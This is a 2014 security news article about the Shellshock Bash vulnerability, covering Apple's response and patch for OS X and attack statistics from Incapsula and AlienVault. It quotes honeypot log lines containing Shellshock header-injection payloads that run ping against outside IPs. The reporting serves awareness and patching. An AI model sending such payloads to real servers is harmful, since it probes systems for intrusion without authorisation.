Pierluigi Paganini
September 30, 2014
A few days ago the Internet community was shocked by the revelation on a new critical flaw, dubbed Bash Bug, which affects the Bash component in billion of Unix and Linus systems worldwide. Apple after a rapid verification, released an official statement to reassure its Mac OS X users, the company declared that the vast majority of Mac computers are not at risk from the Bash Bug, aka the “Shellshock” bug:
“The vast majority of OS X users are not at risk to recently reported bash vulnerabilities,” states the Apple public statement.”Bash, a UNIX command shell and language included in OS X, has a weakness that could allow unauthorized users to remotely gain control of vulnerable systems. With OS X, systems are safe by default and not exposed to remote exploits of bash unless users configure advanced UNIX services. We are working to quickly provide a software update for our advanced UNIX users.“ states the company announcement.
Resuming the majority of Apple OS X users were considered to be safe by the company so long as they haven’t configured any advanced access to their systems. The statement was criticized by IT security community, due to the false sense of security he gave to the MAC OS X users, because their systems were anyway vulnerable to the Bash Bug. To avoid problems I suggested to Apple OS X users to disable any advanced UNIX options waiting for the patch will be issued.
The Shellshock patch arrived tonight, the updates are available for the following OS versions:
Unfortunately threat actors just after the disclosure of the Shellshock were trying to exploit Bash Bug flaw, scanning of the entire Internet to identify vulnerable machines and run the exploits.
The security firm Incapsula reported that in a 12-hour period, its systems recorded 725 attacks, originated from 400 unique IP addresses mainly located in US and China, per hour against a total of 1,800 domains.
“This is pretty high for a single vulnerability,” Tim Matthews, vice president of marketing at Incapsula, said.
“In the four days that have passed since the Shellshock vulnerability disclosure, Incapsula’s web application firewall has deflected over 217,089 exploit attempts on over 4,115 domains.During this period the average attack rate has nearly doubled, climbing to over 1,970 attacks per hour. As of this time, Incapsula’s system has documented Shellshock attacks originating from over 890 offending IPs worldwide.” states a blog post from Incapsula
Also experts at AlienVault confirmed that the disclosure of the flaw has triggered numerous attack, the team is running a new module in their honeypots to track the attempts exploiting the ShellShock bug and in just 24 hours they detected several hits. The majority of attacks is scanning the Internet simple sending a ping command back to the attacker’s machine:
209.126.230.72 - - [25/Sep/2014 05:14:12] "GET / HTTP/1.0" 200 -
referer, () { :; }; ping -c 11 209.126.230.74 122.226.223.69 - - [25/Sep/2014 06:56:03] "GET http://www.k2proxy.com//hello.html HTTP/1.1" 200 89.207.135.125 - - [25/Sep/2014 07:23:43] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 user-agent, () { :;}; /bin/ping -c 1 198.101.206.138
The experts also detected two attackers that are exploiting the ShellShock flaw to serve and install two different strains of malware on the victims.
The majority of the attacks aim to gain shell on a vulnerable machine in order to hijack it, according to data provided by Incapsula nearly 18.37 percent of the attacks are attempts to establish remote access and use it to hijack the server (e.g., using Python or Perl scripts), meanwhile DDoS Malware account for 16.64 percent.
Don’t wasts time … update your system!
(Security Affairs – Apple, Shellshock )
